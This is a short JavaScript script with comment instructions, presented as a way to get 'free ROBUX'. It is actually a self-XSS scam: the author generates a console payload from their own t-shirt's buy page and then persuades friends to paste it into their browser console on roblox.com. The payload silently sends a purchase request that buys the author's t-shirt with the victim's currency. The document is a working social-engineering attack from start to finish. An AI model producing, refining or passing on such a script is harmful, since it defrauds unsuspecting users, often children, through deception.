//How to get free ROBUX using the catalog //step 1) create a t-shirt and make the price 5 robux //step 2) go to the buy page for your t-shirt and press Ctrl+Shift+J (only works on chrome) //step 3) copy this entire script and paste in in the console //step 4) it should say some stuff starting with //script by urban and ending with //created by urban //step 5) copy the stuff between those two lines and save it somewhere //step 6) tell a friend you found a free robux script //step 7) if they ask how tell them to go on roblox.com, press Ctrl+Shift+J, then send them the script starting with //script by urban and ending with //created by urban and tell them to type it in the console and press enter. if they do this you get 5 robux //step 8) do step 6 and step 7 but with as many people as you can find for more robux var btnData = document.getElementsByClassName("btn-fixed-width-lg btn-primary-lg PurchaseButton")[0].attributes; var buyData = document.getElementById("item-container").attributes; var newScript = "var buy = 'https://www.roblox.com/API/Item.ashx?rqtype=purchase&productID=ABC420YOLO&expectedCurrency=1&expectedPrice=ABC123YOLO&expectedSellerId=ABC360YOLO&userAssetID=ABC207YOLO'; $.ajax({ url: buy, type: 'POST' });"; function loadAttributes(data, name) { for(var i = 0; i < data.length; i++) { if(data[i].name.indexOf('data-product-id') >= 0) { newScript = newScript.replace('ABC420YOLO', data[i].value); } if(data[i].name.indexOf('data-expected-price') >= 0) { newScript = newScript.replace('ABC123YOLO', data[i].value); } if(data[i].name.indexOf('data-expected-seller-id') >= 0) { newScript = newScript.replace('ABC360YOLO', data[i].value); } if(data[i].name.indexOf('data-userasset-id') >= 0) { newScript = newScript.replace('ABC207YOLO', data[i].value); } } } loadAttributes(btnData, 'btnData'); loadAttributes(buyData, 'buyData'); console.log("//script by urban420 network\n" + newScript + "\n//created by urban420 network");